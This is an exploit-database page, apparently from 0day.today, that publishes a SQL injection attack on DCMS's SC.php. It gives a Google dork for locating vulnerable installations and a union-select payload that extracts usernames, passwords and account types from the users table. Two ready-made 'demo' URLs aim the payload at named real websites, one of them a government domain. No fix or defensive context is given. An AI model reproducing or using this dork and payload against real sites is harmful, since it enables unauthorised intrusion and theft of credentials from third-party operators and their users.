[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DCMS (SC.php) SQL Injection Vulnerability

Author
Dark.Man
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12985
Category
web applications
Date add
01-07-2010
Platform
php
=========================================
DCMS (SC.php) SQL Injection Vulnerability
=========================================


# Exploit Title: DCMS (SC.php) SQL Injection Vulnerability
# Date: 01.07.2010
# Author: Dark.Man > dark.kopat@gmail.com
# Thanks To: ALimanov / Diq3N / By.HuCRe / SkyTurk / 3KStyL3 /
WatChFul / P_i_X_X_e / Mystery / SLaduR / PJIX / Flood...!! / tricks /
th3spy
# Homepage: http://www.Root-Secure.Org/
# Software Link: http://www.dibagroup.com/
# Version: PTCPay GEN4
# Google dork : inurl:"SC.php?type=static" or "Powered By: DCMS 2.3.3"
# Category: SQL Injection

---- ?Exploit ----

http://www.site.com/SC.php?type=static&id=12'; and 1=0 union select
0,1,group_concat(CHAR(60, 98, 114,
62),username,0x3a,password,0x3a,type),3,4,5,6 from users+--+

{Demo} : http://ea-customs.gov.ir/SC.php?type=static&id=-12'%20union%20select%200,1,group_concat(CHAR(60,%2098,%20114,%2062),username,0x3a,password,0x3a,type),3,4,5,6%20from%20users+--+

{Demo 2} : http://www.dibagroup.com/SC.php?type=static&id=-12'%20union%20select%200,1,group_concat(CHAR(60,%2098,%20114,%2062),username,0x3a,password,0x3a,type),3,4,5,6%20from%20users+--+



#  0day.today [2024-12-25]  #